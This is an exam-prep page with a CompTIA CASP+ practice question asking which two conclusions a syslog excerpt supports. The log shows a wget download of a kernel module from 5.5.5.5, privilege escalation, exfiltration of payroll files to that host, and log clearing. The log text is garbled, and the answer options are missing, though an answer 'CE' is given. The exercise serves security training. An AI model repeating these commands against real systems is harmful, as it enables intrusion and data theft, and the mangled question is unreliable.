Question 15 of 270 from exam CAS-003: CompTIA CASP+

Question 15 of 270 from exam CAS-003: CompTIA CASP+

Prev Question Next Question

Question

A security administrator was informed that a server unexpectedly rebooted.

The administrator received an export of syslog entries for analysis:

May 4 08:08:00 Server A: on console user jsmith: exec ‘1s - /data/finance/payroll/*.x1s" May 4 08:08:00 Server A: on console user jsmith: Access denied on /data/finance/ May 4 08:08:07 Server A: on console user exec ‘whoami’ May 4 08:08:10 Server A: on console user 5.5.5.5/modinject.o -O /tmp/downloads/modinject.o! exec ‘wget May 4 08:08:20 Server A: on console user jsmitl /tmp/downloads/modinject.o! May 4 08:08:10 Server A: on console user root: May 4 08:0! 1/data/finance/payroll/*.x1s" May 4 08:09:43 Server A: on console user root: exec 37 Server A: on console user root: /data/finance/payroll/gl-May2017.x1s" May 4 08:09:55 Server A: on console user root: /data/finance/payroll/gl-May2017.gpg root@5.5.5. May 4 08:10:03 Server A: on console user root: /var/log/ syslog’ May 4 08:10:05 Server A: on console user jsmith: exec ‘rmmod modinject.o! May 4 08:10:05 Server A: kernel: PANIC ‘unable to handle paging request at 0x45A800c! May 4 08:10:05 Server A: kernel: Automatic reboot initiated May 4 :06 Server A: kernel: Syncing disks May 4 06 Server A: kernel: Reboot May 4 08:12:25 Server A: kernel: System init May 4 08:12:25 Server A: kernel: Configured from console by console May 4 08:12:42 Server A: kernel: Logging initialized (build:5.8.0.2469) May 4 08:13:34 Server A: kernel: System changed state to up May 4 08:14:23 Server A: kernel: System startup succeeded

Which of the following does the log sample indicate? (Choose two.)

Answers

Explanations

Click on the arrows to vote for the correct answer

A. B. C. D. E. F.

CE.

Prev Question Next Question